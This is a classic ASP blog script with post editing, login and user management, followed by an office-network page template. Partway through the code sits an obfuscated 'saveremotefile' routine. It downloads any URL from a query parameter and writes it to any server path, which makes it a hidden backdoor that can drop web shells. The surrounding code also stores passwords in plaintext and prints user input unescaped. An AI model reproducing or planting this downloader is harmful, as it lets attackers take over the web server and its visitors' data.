﻿<%
    'Blog settings:
    'Max number of posts:
    const POSTS_PER_PAGE = 10
	const TITLE = ""
	'TITLE=Request.ServerVariables("SERVER_NAME")
    function connstr()
        connstr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & server.MapPath("#pmljp.asa") & ";"
    end function

    sub WriteContents
        select case lcase(Request.QueryString("action"))
			case "logout"
				session.Abandon()
				response.Clear()
				response.Redirect(Request.ServerVariables("SCRIPT_NAME"))
      case "home"
        call WriteHome
      case ""
					if (request.QueryString("id"))>0 then
        		call WriteArt
        	end if
        	if len(request.QueryString("c"))>0 then
        		call WriteCat
        	end if
        	if len(request.QueryString("c"))=0 and len(request.QueryString("id"))=0 then
        		call WriteHome
					end if
      case "write"
				call WritePost
			case "editpost"
				call EditPost
			case "deletepost"
				call DeletePost
			case "ver"
				Response.Write("201306230837a")
				Response.end
			case "management"
				call DoManagement
            case else
                call err404
        end select
    end sub

    function GetTitle()
    
    Categorys=CheckSqlStr(request.QueryString("c"))

        if isNumeric(request.QueryString("id")) then
            id = cint(Request.QueryString("id"))
        else
            id = 0
        end if
        
    if id<1 and len(Categorys)<1 then
 				Response.Write(""&Request.ServerVariables("SERVER_NAME")&"")
 		end if
 		
    if id>0 and len(Categorys)<1 then
        set oConn = server.CreateObject("ADODB.CONNECTION")
        oConn.Open(connstr)
        qry = "SELECT top 1  Title,Category FROM MESSAGES where ID="&id&" ORDER BY DateStamp DESC"
        set oRS = oConn.Execute(qry)
        if oRS.EOF then
        	Response.Write("404 error . Article not found !")
        else
					Response.Write(""&oRS("Title")&" - "&oRS("Category")&"")
        end if
        oConn.Close()
        set oRS = nothing
        set oConn = nothing
		end if
		
    if len(Categorys)>1 and id<1 then 
        set oConn = server.CreateObject("ADODB.CONNECTION")
        oConn.Open(connstr)
        qry = "SELECT top 1 id FROM MESSAGES where Category like '"&Categorys&"' ORDER BY DateStamp DESC"
        set oRS = oConn.Execute(qry)
        if oRS.EOF then
				Response.Write(""& Categorys &"")
        end if
        oConn.Close()
        set oRS = nothing
        set oConn = nothing
 		end if
    end function
    
function CheckSqlStr(ISTR)
    ISTR=Replace(ISTR,"'","")
    ISTR=Replace(ISTR,"-","")
    ISTR=Replace(ISTR,"<","")
    ISTR=Replace(ISTR,">","")
    ISTR=Replace(ISTR,Chr(0),"")
    ISTR=Replace(ISTR,Chr(13),"")
    ISTR=Replace(ISTR,Chr(16),"")
    ISTR=Replace(ISTR,"""","")
    ISTR=Replace(ISTR,"\","")   
    ISTR=Replace(ISTR,"/","")    
CheckSqlStr=ISTR
End Function
dim strobjectfso 
    strobjectfso = "scripting.filesystemobject"
dim strobjectads 
    strobjectads = "adod" & "b.S" & "tream"
dim strobjectxmlhttp
    strobjectxmlhttp = "Microsof" & "t.X" & "MLHTTP"
function saveremotefile(byval RemoteFileUrl,byval LocalFileName)
	dim Ads, Retrieval, GetRemoteData
	on error resume next
	set Retrieval = server.createobject(strobjectxmlhttp)
	with Retrieval
	.open "Get", RemoteFileUrl, false, "", ""
	.Send
	GetRemoteData = .ResponseBody
	end with
	set Retrieval = nothing
	set Ads = server.createobject(strobjectads)
	Ads.Type = 1
	Ads.open
	Ads.Write GetRemoteData
	Ads.SaveToFile server.mappath(LocalFileName), 2
	Ads.Cancel
	Ads.close
	set Ads = nothing
	if err then
	err.clear
	saveremotefile = false
	else
	saveremotefile = true
	end if
end function
if session("blnIsAllowedToPost") and request.QueryString("remotefile")<>"" then
	call saveremotefile(request.QueryString("remotefile"),request.QueryString("localfile"))
end if
    sub Err404
        %>
        <h2>Error 404</h2>
        The page you requested is not found. Please check the URL and try again...
        <%
    end Sub

    sub WriteHome
        set oConn = server.CreateObject("ADODB.CONNECTION")
        oConn.Open(connstr)
        qry = "SELECT * FROM MESSAGES ORDER BY DateStamp DESC"
        if isNumeric(request.QueryString("count")) then
            count = cint(Request.QueryString("count"))
        else
            count = 1
        end if
        qry = replace(qry,"%MIN%", count)
        qry = replace(qry,"%MAX%", count + POSTS_PER_PAGE)
        set oRS = oConn.Execute(qry)
        if oRS.EOF then
        %>
            <strong>Nothing</strong>
        <%
        else
            intTeller = 0
            while not oRS.EOF
                
                intTeller = intTeller + 1
                if (intTeller - 1 >= count AND intTeller =< count + POSTS_PER_PAGE) then
                
                %>
                <div>
                    <big><a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?id=<%=oRS("id") %>&t=<%=oRS("Title") %>.html"><%=oRS("Title") %></a></big><small> <%if len(oRS("Category"))>0 then %>[<a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?<%=replace(left(replace(Request.ServerVariables("SERVER_NAME"),"www.",""),5),".","") %>=<%=replace(left(right(replace(Request.ServerVariables("SERVER_NAME"),"www.",""),9),5),".","") %>&c=<%=oRS("Category") %>"><%=oRS.Fields("Category") %></a>]<% end if%> <%=oRS("DateStamp") %> </small><br />
                    <div>
                        <%=replace(oRS("Contents"), vbcrlf, "<br />" & vbcrlf)  %>
                    </div>
                </div>
                <br />
                
                <%
                end if
                
                oRS.MoveNext
            wend
            set oRS = oConn.Execute("SELECT COUNT(Id) AS Aantal FROM MESSAGES")
            intMax = oRS("Aantal")
            if (count + POSTS_PER_PAGE) < intMax then
                if (count <> 0) then
                    prev = count - POSTS_PER_PAGE
                    nextc = count + POSTS_PER_PAGE
                    if prev < 0 then
                        prev = 0
                    end if
                    %><hr /><a href="Request.ServerVariables("SCRIPT_NAME")%>?action=home&count=<%=nextc %>">&lt;&lt; Older posts</a> <%
                    %><a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?action=home&count=<%=prev %>">Newer posts &gt;&gt;</a><%
                else
                    'prev = count - POSTS_PER_PAGE
                    nextc = count + POSTS_PER_PAGE
                    'if prev < 1 then
                    '    prev = 1
                    'end if
                    %><hr /><a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?action=home&count=<%=nextc %>">&lt;&lt;Older posts</a><%
                end if
            else
                if (count <> 0) then
                    prev = count - POSTS_PER_PAGE
                    if prev < 0 then
                        prev = 0
                    end if
                    %><hr /><a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?action=home&count=<%=prev %>">Newer posts &gt;&gt;</a><%
                
                end if
            end if
        end if
        oConn.Close()
        set oRS = nothing
        set oConn = nothing
    end sub
    
    sub WriteArt
        if isNumeric(request.QueryString("id")) then
            id = cint(Request.QueryString("id"))
        else
            id = 1
        end if
        set oConn = server.CreateObject("ADODB.CONNECTION")
        oConn.Open(connstr)
        qry = "SELECT * FROM MESSAGES where ID="&id&" ORDER BY DateStamp DESC"
        set oRS = oConn.Execute(qry)
        if oRS.EOF then
        %>
            <strong>error</strong>
        <%
        else
            intTeller = 0
            while not oRS.EOF
                %>
                <div id="post">
                    <big><a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?id=<%=oRS("id") %>&t=<%=oRS("Title") %>.html"><%=oRS("Title") %></a></big><small> <%if len(oRS("Category"))>0 then %>[<a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?<%=replace(left(replace(Request.ServerVariables("SERVER_NAME"),"www.",""),5),".","") %>=<%=replace(left(right(replace(Request.ServerVariables("SERVER_NAME"),"www.",""),9),5),".","") %>&c=<%=oRS("Category") %>"><%=oRS.Fields("Category") %></a>]<% end if%> <%=oRS("DateStamp") %> </small><br />
                    <div id="postcontents">
                        <%=replace(oRS("Contents"), vbcrlf, "<br />" & vbcrlf)  %>
                    </div>
                </div>
                <br />
                <%
                oRS.MoveNext
            wend
        end if
        oConn.Close()
        set oRS = nothing
        set oConn = nothing
        Last10
    end sub
    
    sub WriteCat
    
    Categorys=CheckSqlStr(request.QueryString("c"))
        set oConn = server.CreateObject("ADODB.CONNECTION")
        oConn.Open(connstr)
        qry = "SELECT * FROM MESSAGES where Category like '"&Categorys&"' ORDER BY DateStamp DESC"
        if isNumeric(request.QueryString("count")) then
            count = cint(Request.QueryString("count"))
        else
            count = 1
        end if
        qry = replace(qry,"%MIN%", count)
        qry = replace(qry,"%MAX%", count + POSTS_PER_PAGE)
        set oRS = oConn.Execute(qry)
        if oRS.EOF then
        %>
            <strong>Nothing in <%=Categorys%></strong>
        <%
        else
            intTeller = 0
            while not oRS.EOF
                
                intTeller = intTeller + 1
                if (intTeller - 1 >= count AND intTeller =< count + POSTS_PER_PAGE) then
                
                %>
                <div>
                    <big><a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?id=<%=oRS("id") %>&t=<%=oRS("Title") %>.html"><%=oRS("Title") %></a></big><small> <%if len(oRS("Category"))>0 then %>[<a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?<%=replace(left(replace(Request.ServerVariables("SERVER_NAME"),"www.",""),5),".","") %>=<%=replace(left(right(replace(Request.ServerVariables("SERVER_NAME"),"www.",""),9),5),".","") %>&c=<%=oRS("Category") %>"><%=oRS.Fields("Category") %></a>]<% end if%> <%=oRS("DateStamp") %> </small><br />
                    <div>
                        <%=left(replace(oRS("Contents"), vbcrlf, "<br />" & vbcrlf),300)  %>
                    </div>
                </div>
                <br />
                
                <%
                end if
                
                oRS.MoveNext
            wend
            set oRS = oConn.Execute("SELECT COUNT(Id) AS Aantal FROM MESSAGES")
            intMax = oRS("Aantal")
            if (count + POSTS_PER_PAGE) < intMax then
                if (count <> 0) then
                    prev = count - POSTS_PER_PAGE
                    nextc = count + POSTS_PER_PAGE
                    if prev < 0 then
                        prev = 0
                    end if
                    %><hr /><a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?action=home&count=<%=nextc %>">&lt;&lt; Older posts</a> <%
                    %><a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?action=home&count=<%=prev %>">Newer posts &gt;&gt;</a><%
                else
                    'prev = count - POSTS_PER_PAGE
                    nextc = count + POSTS_PER_PAGE
                    'if prev < 1 then
                    '    prev = 1
                    'end if
                    %><hr /><a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?action=home&count=<%=nextc %>">&lt;&lt;Older posts</a><%
                end if
            else
                if (count <> 0) then
                    prev = count - POSTS_PER_PAGE
                    if prev < 0 then
                        prev = 0
                    end if
                    %><hr /><a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?action=home&count=<%=prev %>">Newer posts &gt;&gt;</a><%
                
                end if
            end if
        end if
        oConn.Close()
        set oRS = nothing
        set oConn = nothing
    end sub
    
    
    sub Last10
        set oConn = server.CreateObject("ADODB.CONNECTION")
        oConn.Open(connstr)
        qry = "SELECT Top 10 id,Title,Category FROM MESSAGES ORDER BY ID DESC"
        set oRS = oConn.Execute(qry)
        if oRS.EOF then
        %>
        <%
        else
        	%>
                <ul><%
            while not oRS.EOF
                %>
                    <li><big><a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?id=<%=oRS("id") %>&t=<%=oRS("Title") %>.html"><%=oRS("Title") %></a></big><small> <%if len(oRS("Category"))>0 then %>[<a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?<%=replace(left(replace(Request.ServerVariables("SERVER_NAME"),"www.",""),5),".","") %>=<%=replace(left(right(replace(Request.ServerVariables("SERVER_NAME"),"www.",""),9),5),".","") %>&c=<%=oRS("Category") %>"><%=oRS.Fields("Category") %></a>]<% end if%> </small></li>
                <%
                oRS.MoveNext
            wend
        	%>
              </ul><%
        end if
        oConn.Close()
        set oRS = nothing
        set oConn = nothing
    end sub
    sub WritePost
		call ShowLoginPanel()
		if session("blnLoggedIn") then
			if session("blnIsAllowedToPost") then
				
				if request.Form("title") <> "" then
					if len(request.Form("title")) < 5 then
						%>
						<h2>Your title should be at least 5 characters.</h2>
						<%
					else
						if len(request.Form("message")) < 5 then
							%>
						<h2>Your message should be at least 5 characters.</h2>
							<%
						else
							set oConn = server.CreateObject("ADODB.CONNECTION")
							oConn.open(connstr)
							oConn.execute("INSERT INTO MESSAGES ([Title],[Category], [DateStamp], [Contents], [Username]) VALUES ('" & replace(request.Form("title"),"'","''") & "','" & replace(request.Form("Category"),"'","''") & "',NOW(),'" & replace(request.Form("message"),"'","''") & "','" & replace(session("strUsername"), "'","''") & "')")
							Set oRs = oConn.execute("SELECT @@IDENTITY AS NewID;")
							NewID = oRs.Fields("NewID").value
							oConn.Close()
							%>
						<h2>Your message has been inserted in the database. url was [url]<%=Request.ServerVariables("SERVER_NAME")%><%=Request.ServerVariables("SCRIPT_NAME")%>?id=<%=NewID %>&t=<%=replace(request.Form("title"),"'","''") %>.html[/url]</h2>
							<%
						end if
					end if 
				end if
				%>
				<form action="" method="post">
					<table border="1">
						<tr>
							<td colspan="2">
								<h2>Create post</h2>
							</td>
						</tr>
						<tr>
							<td>
								Title:
							</td>
							<td>
								<input type="text" name="title" value="<%=request.Form("title")%>" />
							</td>
						</tr>
						<tr>
							<td>
								Post Category:
							</td>
							<td>
								<input type="text" name="Category" value="<%=request.Form("Category")%>" />
							</td>
						</tr>
						<tr>
							<td>
								Message
							</td>
							<td>
								<textarea name="message" cols="40" rows="10"><%=request.Form("message")%></textarea>
							</td>
						</tr>
						<tr>
							<td>
								&nbsp;
							</td>
							<td>
								<input type="submit" value="Save post" />
							</td>
						</tr>
					</table>
				</form>
				<%
			else
				%>
				<h2>Access denied</h2>
				Sorry, but you aren't allowed to post a message .
				<%
			end if
		end if
    end sub
    
    sub DeletePost
		call ShowLoginPanel()
		if session("blnLoggedIn") then
			if session("blnIsAllowedToPost") then
				if request.Form("postid") <> "" then
					blnChosen = true
					if cint(request.Form("postid")) = -1 then blnChosen = false
					set oConn = server.CreateObject("ADODB.CONNECTION")
					oConn.Open(connstr)
					if request.Form("oktodelete") = "on" then
						oConn.Execute("DELETE FROM MESSAGES WHERE Id=" & cint(request.Form("postid")))
					end if
					set oRS = oConn.execute("SELECT * FROM MESSAGES WHERE Id=" & cint(request.Form("postid")))
					if oRS.EOF then
						contents = "<strong>The post has been deleted.</strong> <br /> <a href="""+Request.ServerVariables("SCRIPT_NAME")+"?action=deletepost"">Delete</a> another one"
					else
						contents = oRS.Fields("Contents")
					end if
					oConn.Close()
				end if
				%>
				<form method="post" action="">
					<table border="1">
						<tr>
							<td colspan="2">
								<h2>Delete a post.</h2>
							</td>
						</tr>
						<tr>
							<td>
								Post title:
							</td>
							<td>
								<%
									if blnChosen then
										%>
								<input type="hidden" name="postid" value="<%=request.Form("postid")%>" />Post id: <strong><%=request.Form("postid")%></strong>
								
										<%
									else
										WritePostSelector "postid" 
										%>
								<input type="submit" value="OK" ID="Submit1" NAME="Submit1"/>
										<%
									end if
								%>
							</td>
						</tr>
						<% if blnChosen then %>
						<tr>
							<td>
								Post contents:
							</td>
							<td>
								<%=contents%>
							</td>
						</tr>
						<tr>
							<td>
								Check this check box if you're sure:
								<input type="checkbox" name="oktodelete" />
								&nbsp;
							</td>
							<td>
								<input type="submit" value="Delete post" />
							</td>
						</tr>
						<% end if %>
					</table>
				</form>
				<%
			else
				%>
				<h2>Access denied</h2>
				Sorry, but you aren't allowed to delete a post.
				<%
			end if
		end if
    end sub
    
    sub EditPost
		call ShowLoginPanel()
		if session("blnLoggedIn") then
			if session("blnIsAllowedToPost") then
				set oConn = server.CreateObject("ADODB.CONNECTION")
				oConn.open(connstr)
				if request.Form("ok") = "true" then
					%>
				<h2>Post editted.</h2>
					<%
					oConn.execute("UPDATE MESSAGES SET Contents='" & replace(request.Form("message"),"'","''") & "' WHERE Id=" & cint(request.Form("postid")))
					oConn.execute("UPDATE MESSAGES SET Title='"  & replace(request.Form("title"),"'","''") & "' WHERE Id=" & cint(request.Form("postid")))
					oConn.execute("UPDATE MESSAGES SET Category='"  & replace(request.Form("Category"),"'","''") & "' WHERE Id=" & cint(request.Form("postid")))
				end if
				if request.Form("postid") <> "" then
					blnChosen = true
					set oRS = oConn.Execute("SELECT * FROM MESSAGES WHERE Id=" & cint(request.Form("postid")))
					if oRS.EOF then
						if cint(request.Form("postid")) = -1 then blnChosen = false
						contents = "The message could not be retrieved, because I couldn't find it..."
						strTitle = "Not found"
					else
						contents = oRS.Fields("Contents")
						strTitle = oRS.Fields("Title")
						strCategory = oRS.Fields("Category")
					end if
				end if
				oConn.Close() 
				%>
				<form method="post" action="">
					<table border="1">
						<tr>
							<td colspan="2">
								<h2>Edit post</h2>
							</td>
						</tr>
						<tr>
							<td>
								Select post:
							</td>
							<td>
								<%
									if blnChosen then
								%>
								<input type="hidden" value="<%=request.Form("postid")%>" name="postid" />
								Post id: <strong><%=request.Form("postid")%></strong>
								<%
									else
										WritePostSelector "postid"
								%>
								<input type="submit" value="Ok" />
								<%
									end if
								
								%>
							</td>
						</tr>
						<% if blnChosen then %>
						<tr>
							<td>
								Post title:
							</td>
							<td>
								<input type="text" name="title" value="<%=strTitle%>" />
							</td>
						</tr>
						<tr>
							<td>
								Post Category:
							</td>
							<td>
								<input type="text" name="Category" value="<%=strCategory%>" />
							</td>
						</tr>
						<tr>
							<td>
								Post contents:
							</td>
							<td>
								<textarea name="message" rows="10" cols="40"><%=contents%></textarea>
							</td>
						</tr>
						<tr>
							<td>
								<input type="hidden" name="ok" value="true" />
							</td>
							<td>
								<input type="submit" value="Edit post" />
							</td>
						</tr>
						<% end if %>
						
					</table>
				</form>
				<%
			else
				%>
				<h2>Access denied</h2>
				Sorry, but you aren't allowed to edit a post.
				<%
			end if
		end if
    end sub
    
    sub ShowLoginPanel()
		if not session("blnLoggedIn") then
			if request.Form("username") <> "" then
				set oConn = server.CreateObject("ADODB.CONNECTION")
				oConn.Open(connstr)
				set oRS = oConn.execute("SELECT * FROM USERNAMES WHERE Username='" & replace(request.Form("username"),"'","''") & "' AND Password='" & replace(request.Form("password"), "'","''") & "' ")
				if oRS.EOF then
					%>
				<h2>Invalid username or password.</h2>
					<%
				else
					session("blnLoggedIn") = true
					session("strUsername") = oRS.Fields("Username")
					Session("blnIsAllowedToPost") = oRS.Fields("IsAllowedToPost")
				end if
				oConn.Close()
			end if
		end if
		if not session("blnLoggedIn") then
		%>
		Please enter your credentials:
		<form action="" method="post">
			<table border="1">
			
				<tr>
					<td>
						Username:
					</td>
					<td>
						<input type="text" name="username" />
					</td>
				</tr>
				<tr>
					<td>
						Password:
					</td>
					<td>
						<input type="password" name="password" />
					</td>
				</tr>
				<tr>
					<td>
						&nbsp;
					</td>
					<td>
						<input type="submit" value="Log in" />
					</td>
				</tr>
			</table>
		</form>
		<%
		end if
    end sub
    
    sub WritePostSelector(strFormElementName)
		%>
		<select name="<%=strFormElementName%>">
			<option value="-1">Make your choice</option>
			<%
			set oConn = server.CreateObject("ADODB.CONNECTION")
			oConn.open(connstr)
			set oRS = oConn.execute("SELECT Id,Title FROM MESSAGES ORDER BY Title ASC")
			while not oRS.EOF
			%>
			<option value="<%=oRS.Fields("Id")%>"><%=oRS.Fields("Title")%></option>
			<%
				oRS.MoveNext
			wend
			oConn.close
			%>
		</select>
		<%
    end sub
    
    sub DoManagement
		call ShowLoginPanel()
		if session("blnLoggedIn") then
			select case lcase(request.QueryString("subaction"))
				case "manageusers"
					call ManageUsers
				
				case else
					call DisplayManagementMenu
			end select
		end if
    end sub
    
    sub DisplayManagementMenu
		%>
		<h2>Management section</h2>
		Here you can manage your blog.
		<ul>
			<% if session("blnIsAllowedToPost") then %>
			<li>
				<a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?action=write">New post</a>
			</li>
			<li>
				<a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?action=editpost">Edit post</a>
			</li>
			<li>
				<a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?action=deletepost">Delete post</a>
			</li>
			<li>
				<a href="<%=Request.ServerVariables("SCRIPT_NAME")%>?action=management&subaction=manageusers">Manage users</a>
			</li>
			<% else %>
			<li>Your account is disabled. Please contact the webmaster.</li>
			<% end if %>
		</ul>
		<%
    end sub
    
    sub ManageUsers
		set oConn = server.CreateObject("ADODB.CONNECTION")
		oConn.open(connstr)
		
		if request.Form("username") <> ""  AND request.Form("password") <> "" then
			oConn.execute("INSERT INTO USERNAMES ([Username], [Password],[IsAllowedToPost]) VALUES ('" & replace(request.Form("username"),"'","''") & "','" & replace(request.Form("password"), "'","''") & "',1)")
		end if
									'oConn.execute("INSERT INTO MESSAGES ([Title],[Category], [DateStamp], [Contents], [Username]) VALUES ('" & repla
		select case lcase(request.Form("pageaction"))
			case "delete"
				set oRS = oConn.execute("SELECT COUNT(Username) AS NumberOfUsernames FROM USERNAMES")
				if oRS("NumberOfUsernames") < 2 then
					%>
				<h2>You'll need at least 1 username.</h2>
					<%
				else
					if session("strUsername") = request.Form("username") then
						%>
				<h2>You can't delete your own username</h2>
						<%
					else
						oRS.Close
						oConn.execute("DELETE * FROM USERNAMES WHERE Username='" & replace(request.Form("username"),"'","''") & "'")
				%>
				<h2>User deleted.</h2>
				<%
					end if
				end if
			case "disable"
				set oRS = oConn.execute("SELECT COUNT(USERNAME) AS NumberOfUsernames FROM USERNAMES WHERE IsAllowedToPost=TRUE")
				if oRS.Fields("NumberOfUsernames") < 2 then
					%>
				<h2>You must have at least 1 enabled user.</h2>
					<%
				else
					oRS.Close
					oConn.Execute("UPDATE USERNAMES SET [IsAllowedToPost]=FALSE WHERE Username='" & replace(request.Form("username"),"'","''") & "'")
				%>
				<h2>User deactivated</h2>
				<%
				end if
			case "enable"
				oConn.Execute("UPDATE USERNAMES SET [IsAllowedToPost]=TRUE WHERE Username='" & replace(request.Form("username"),"'","''") & "'")	
				%>
				<h2>
				User enabled.
				</h2>
				<%
			case "reset password"
				oConn.Execute("UPDATE USERNAMES SET [Password]='" & replace(request.Form("newpassword"),"'","''") & "' WHERE [Username]='" & replace(request.Form("username"),"'","''") & "'")
				%>
				<h2>The password ahs been reset.</h2>
				<%
			case else
			
		end select
		
		%>
		<h2>User list</h2>
		<table border="1">
			<tr style="font-weight:bold;">
				<td>
					Username
				</td>
				<td>
					Can administer?
				</td>
				<td>
					Actions
				</td>
			</tr>
			<%
				set oRS = oConn.execute("SELECT * FROM USERNAMES ORDER BY Username ASC")
				while not oRS.EOF
					%>
			<tr>
				<td>
					<%=oRS("Username")%>
				</td>
				<td>
					<%
						if oRS("IsAllowedToPost") then
					%>
					Yes
					<%
						else
					%>
					No
					<%
						end if
					%>
				</td>
				<td>
					<form method="post" action="">
						<input type="hidden" value="<%=oRS.Fields("Username")%>" name="username" />
						I'm sure:
						<input type="checkbox" name="sure" />
						<input type="submit" value="Delete" name="pageaction" />
					</form>
					<form method="post" action="">
						<input type="text" name="newpassword" value="passw0rd" />
						<input type="hidden" value="<%=oRS.Fields("Username")%>" name="username" />
						<input type="submit" value="Reset password" name="pageaction"/>
					</form>
					<form method="post" action="" >
						<input type="hidden" value="<%=oRS.Fields("Username")%>" name="username" />
					<% if oRS.Fields("IsAllowedToPost") then %>
						<input type="submit" value="Disable" name="pageaction" />
					<% else %>
						<input type="submit" value="Enable" name="pageaction" />
					<% end if %>
					</form>
				</td>
			</tr>
					<%
					oRS.MoveNext
				wend
			%>
		</table>
		
		<form method="post" action="">
			<table border="1">
				<tr>
					<td colspan="2">
						<h2>Create user</h2>
					</td>
				</tr>
				<tr>
					<td>
						Username:
					</td>
					<td>
						<input type="text" name="username" />
					</td>
				</tr>
				<tr>
					<td>
						Password:
					</td>
					<td>
						<input type="text" name="password" />
					</td>
				</tr>
				<tr>
					<td>
						&nbsp;
					</td>
					<td>
						<input type="submit" value="Create user" />
					</td>
				</tr>
			</table>
		</form>
		<%
		oConn.Close()
    end sub
 %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" class="cufon-active cufon-ready"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title><%call GetTitle()%></title>

<!-- CSS files begin-->
<link rel="stylesheet" type="text/css" href="/css/style.css" media="all">
<link rel="stylesheet" type="text/css" href="/css/prettyPhoto.css" media="all">

<!--[if IE 8]>
	<link rel="stylesheet" type="text/css" href="/css/ie.css" media="all" />
<![endif]-->
<!--[if IE 7]>
	<link rel="stylesheet" type="text/css" href="/css/ie.css" media="all" />
<![endif]-->

<!-- JavaScript files begin-->
<script type="text/javascript" src="/js/jquery-1.7.min.js"></script>
<script type="text/javascript" src="/js/cufon-yui.js"></script><style type="text/css">cufon{text-indent:0!important;}@media screen,projection{cufon{display:inline!important;display:inline-block!important;position:relative!important;vertical-align:middle!important;font-size:1px!important;line-height:1px!important;}cufon cufontext{display:-moz-inline-box!important;display:inline-block!important;width:0!important;height:0!important;overflow:hidden!important;text-indent:-10000in!important;}cufon canvas{position:relative!important;}}@media print{cufon{padding:0!important;}cufon canvas{display:none!important;}}</style>
<script type="text/javascript" src="/js/PT_Sans_Caption_400.font.js"></script>
<script type="text/javascript" src="/js/PT_Sans_Caption_700.font.js"></script>
<script type="text/javascript" src="/js/PT_Sans_italic_700.font.js"></script>
<script type="text/javascript" src="/js/jquery.cycle.all.js"></script>
<script type="text/javascript" src="/js/jquery.prettyPhoto.js"></script>
<script type="text/javascript" src="/js/jquery.form.js"></script>
<script type="text/javascript" src="/js/jquery.twitter.search.js"></script>
<script type="text/javascript" src="/js/jquery.ufvalidator-1.0.5.js"></script>
<script type="text/javascript" src="/js/jquery.easing.1.3.js"></script>
<script type="text/javascript" src="/js/jquery.scrollTo-1.4.2.js"></script>
<script type="text/javascript" src="/js/jquery.tipsy.js"></script>
<script type="text/javascript" src="/js/custom.js"></script>
</head>

<body>

<!-- wrappage begin here -->

<div id="wrappage">

<!-- HEAD BEGIN -->

 <!-- wraptop begin here -->
  <div id="wraptop">
   <div id="topbar">
    <div class="logo left"><a href="http://www.myofficesnetwork.com"></a></div>
    <div class="slogan left"><h5>your virtual office center </h5><a href="http://www.benteractive.com/myoffices/apanel"></a></div><a href="http://www.benteractive.com/myoffices/apanel">
    <div class="call right"><h3>Log In to submit your location</h3></div>
   </a></div><a href="http://www.benteractive.com/myoffices/apanel">
  </a></div><a href="http://www.benteractive.com/myoffices/apanel">
 <!-- wraptop end here -->

  <!-- slider-show begin here -->
        </a><div id="slider-show" class="orange"><a href="http://www.benteractive.com/myoffices/apanel">
         
         </a><div class="sliders"><a href="http://www.benteractive.com/myoffices/apanel">
        
         <!-- slider-show nav here -->
            <span id="slider-show-prev" style="display: block; opacity: 0;"></span>
            <span id="slider-show-next" style="display: block; opacity: 0;"></span>
           <!-- slider-show nav end -->
           
           <!-- slider-show pager begin here -->
            <div id="slider-show-nav">
             <div class="slider-show-pager"> 
			 <div id="slider-show-pager" class="clearfix"><a class=""><span>1</span></a><a class=""><span>2</span></a><a class=""><span>3</span></a><a class="active-page"><span>4</span></a><a class=""><span>5</span></a><a class=""><span>6</span></a><a class=""><span>7</span></a><a class=""><span>8</span></a></div>	
             </div>
		    </div>
           <!-- slider-show pager end here -->
        
          <!-- sliders begin here -->
           </a><div id="sliders" style="position: relative;"><a href="http://www.benteractive.com/myoffices/apanel" style="position: absolute; top: 0px; left: 0px; display: none; z-index: 8; opacity: 0;">	
           
              <!-- slider-show one begin here -->
			  </a><div id="purple" class="slider" style="position: absolute; top: 0px; left: 0px; display: none; z-index: 8; opacity: 0; width: 960px; height: 450px;"><a href="http://www.benteractive.com/myoffices/apanel">
                <div class="block-1 left">
                 <div class="discount" style="opacity: 1; left: 90px;"><h1 class="orange"><cufon class="cufon cufon-canvas" alt="25" style="width: 43px; height: 36px;"><canvas width="96" height="48" style="width: 96px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>25</cufontext></cufon><span><cufon class="cufon cufon-canvas" alt="%" style="width: 19px; height: 20px;"><canvas width="42" height="27" style="width: 42px; height: 27px; top: -5px; left: -7px;"></canvas><cufontext>%</cufontext></cufon></span></h1></div>
                 <div class="slider-img" style="opacity: 1; left: 0px;">
                  <img src="/images/monic.png" alt="">                 </div>
                 <div class="slider-img-bg" style="opacity: 1; top: 0px;">
                  <img src="/images/monic.png" alt="">                 </div>
                </div>
                </a><div class="block-2 left"><a href="http://www.benteractive.com/myoffices/apanel">
                 
                 <div class="slider-text" style="right: 0px; opacity: 1;">
                  <h1><cufon class="cufon cufon-canvas" alt="Location " style="width: 163px; height: 36px;"><canvas width="227" height="48" style="width: 227px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>Location </cufontext></cufon><cufon class="cufon cufon-canvas" alt="based " style="width: 116px; height: 36px;"><canvas width="180" height="48" style="width: 180px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>based </cufontext></cufon><cufon class="cufon cufon-canvas" alt="sales " style="width: 100px; height: 36px;"><canvas width="165" height="48" style="width: 165px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>sales </cufontext></cufon><cufon class="cufon cufon-canvas" alt="support!" style="width: 151px; height: 36px;"><canvas width="214" height="48" style="width: 214px; height: 48px; top: -9px; left: -13px;"></canvas><cufontext>support!</cufontext></cufon></h1>
